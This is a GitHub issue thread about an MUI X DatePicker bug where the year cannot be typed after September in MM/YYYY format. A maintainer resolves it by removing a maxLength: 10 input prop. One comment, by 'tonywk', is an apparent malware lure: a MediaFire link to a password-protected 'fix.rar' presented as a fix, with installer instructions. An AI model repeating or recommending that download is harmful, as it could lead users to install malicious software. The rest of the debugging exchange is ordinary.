### ISSUE TITLE
[pickers][DatePicker] Unable to type in year for September in MM/YYYY format 

### ISSUE THREAD

**Issue by kkeef11** [mui/mui-x#14353]
### Steps to reproduce

Link to [live example](https://codesandbox.io/p/devbox/mszcm6)

Steps:
1. Double click on Bill Period Override cell to initiate edit capabilities
2. Type S for September, and numbers for year
3. Re-test with any other month

I'm not sure what could be preventing this, initially I figured it's validation, however no errors are triggered, and there isn't any validation that would prevent September from working over any other month, so I'm not sure.

Seems to work fine in the demo here on a much simpler level: https://mui.com/x/react-date-pickers/date-picker/#system-DatePickerViews.tsx

### Current behavior

Type in first 1-3 characters of month, automatically moves to year, then type in year
Every month works except for September 

### Expected behavior

Every month should be able to have the year manually typed in

### Context

Using Data Grid for a Bill table where users are able to input bill information. Around half of our users manually type in month, then year, and so on and so on since there's normally multiple bills. Now that we're entering September, this bug will prevent that.

### Your environment

<details>
  <summary><code>npx @mui/envinfo</code></summary>

```
  System:
    OS: Linux 6.1 Debian GNU/Linux 12 (bookworm) 12 (bookworm)
  Binaries:
    Node: 20.9.0 - /usr/local/bin/node
    npm: 9.8.1 - /usr/local/bin/npm
    pnpm: 8.10.2 - /usr/local/share/npm-global/bin/pnpm
  Browsers:
    Chrome: Not Found
  npmPackages:
    @emotion/react: 11.13.3 => 11.13.3 
    @emotion/styled: 11.13.0 => 11.13.0 
    @mui/material: 5.16.7 => 5.16.7 
    @mui/x-data-grid:  7.14.0 
    @mui/x-date-pickers: 7.14.0 => 7.14.0 
    @types/react: ^18.2.65 => 18.2.65 
    react: ^18.2.0 => 18.2.0 
    react-dom: ^18.2.0 => 18.2.0 
    typescript: ^5.4.2 => 5.4.2
```
</details>

**Search keywords**: September MM/YYYY format

**Comment by tonywk** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by michelengelen** [comment]
Hey @kkeef11 could you try removing this from the slotProps:

```tsx
inputProps: {
  maxLength: 10,
},
```

This is probably the cause of this issue

**Comment by kkeef11** [comment]
> Hey @kkeef11 could you try removing this from the slotProps:
> 
> ```tsx
> inputProps: {
>   maxLength: 10,
> },
> ```
> 
> This is probably the cause of this issue

This was it, can't believe I missed this, thanks!
